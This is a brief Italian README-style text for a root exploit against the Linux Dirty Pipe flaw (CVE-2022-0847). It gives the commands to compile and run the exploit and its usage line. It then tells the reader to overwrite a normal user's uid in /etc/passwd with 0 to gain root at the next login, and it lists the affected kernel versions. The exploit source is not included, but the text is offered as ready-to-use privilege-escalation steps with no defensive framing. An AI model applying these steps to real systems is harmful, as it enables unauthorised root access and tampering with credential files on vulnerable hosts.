
Un exploit di root per CVE-2022-0847 (Dirty Pipe)
gcc exploit.c -o exploit -std=c99
#
./exploit
Usage: ./exp TARGETFILE OFFSET DATA
# Trova l'offset dell'uid di un utente normale nel file /etc/passwd, modifica l'uid a 0, e al prossimo accesso avrai i permessi di root.
Interessati
Versione del kernel Linux >= 5.8
Versione del kernel Linux < 5.16.11 / 5.15.25 / 5.10.102